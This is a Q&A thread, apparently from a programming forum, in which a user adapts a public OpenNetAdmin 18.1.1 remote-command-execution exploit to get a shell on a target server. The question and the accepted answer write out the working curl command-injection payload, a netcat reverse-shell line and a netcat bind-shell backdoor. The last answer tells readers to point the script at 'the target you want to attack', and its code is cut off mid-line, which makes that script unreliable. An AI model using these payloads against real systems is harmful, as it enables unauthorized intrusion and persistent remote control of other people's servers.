# Bash Syntax Problems for Exploit

Tags: linux, bash, syntax, exploit, shellcode

I found an [exploit](https://www.exploit-db.com/exploits/47691) at exploit-db for the OpenNetAdmin 18.1.1

I have to adjust this script so it work for me but I don't get this done. 
This is what I have so far:

```
URL="xxx.xxx.xxx.xxx/ona"
while true;do
 echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx 4444 "}; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
```

The output is just:

```
{nc -e /bin/sh xxx.xxx.xxx.xxx 4444 }
```

I am a bit struggling with the syntax.

What did I do wrong?

Comment: Why did you change the exploit script in that way? If you see the original one, at https://www.exploit-db.com/exploits/47691, it echos just a $ symbol, emulating a shell, asking you for a command to launch in the next line, the curl exploiting the vulnerability

Comment: You need to explain clearer what you are trying to do with this line.  If you want to read the output of `nc` into `cmd` then maybe `read cmd < <(nc -e /bin/sh xxx.xxx.xxx.xxx 4444)`

Comment: Ok, maybe you wanted that nc command to be your cmd, in that case just do a cmd="nc -e /bin/sh xxx.xxx.xxx.xxx 4444 ". I guess you don't need the while loop, since you want to launch only that command

Comment: I wanted to create a reverse shell with this `nc -e /bin/sh xxx.xxx.xxx.xxx 4444`
How is that exploit normally be used? How would you use t?

Comment: It looks like you have just running /bin/sh in the web application. Try to change the command which you want to run on the remote server. E.g "uname -a" or "whoami" in order to look if you have a RCE. (If with this exploit the web application does not answer anything, the command could be running, in this case maybe there is a firewall which is blocking you if you are trying a reverse shell)

Answer (score 0, accepted):

This is what you want, if you just need to launch the nc program. The script supposes that the remote machine is a Linux machine, with /bin/bash and nc (netcat) compiled with the -e support

```
#!/bin/bash
URL="http://.../ona" 
cmd="nc -l -p 4444 -e /bin/sh"
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
```

Comment: But where do I put the target IP URL? the 'x' would be my own ip adress, to connect to my maschine

Comment: You have to to put it in the URl variable, and it should not be an IP address, but a http url. To open a backdoor on the remote machine the syntax is nc -l -p 4444 -e /bin/bash. Why do you want the remote machine to connect to a backdoor on your local machine?

Answer (score -1):

I found a solution that fits:

```
#!/bin/bash
URL="http://xxx.xxx.xxx.xxx/ona/"
while true;do
 echo -n "{/bin/sh -i}"; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltip>
done
```

Just replace the xxx.xxx.xxx.xxx with the target you want to attack and save the script as `shell.sh`

Now run the script with `./shell.sh` and you get an interactive shell on the target system.

To verify that you can now type in `pwd` or `id` and check if you was successful.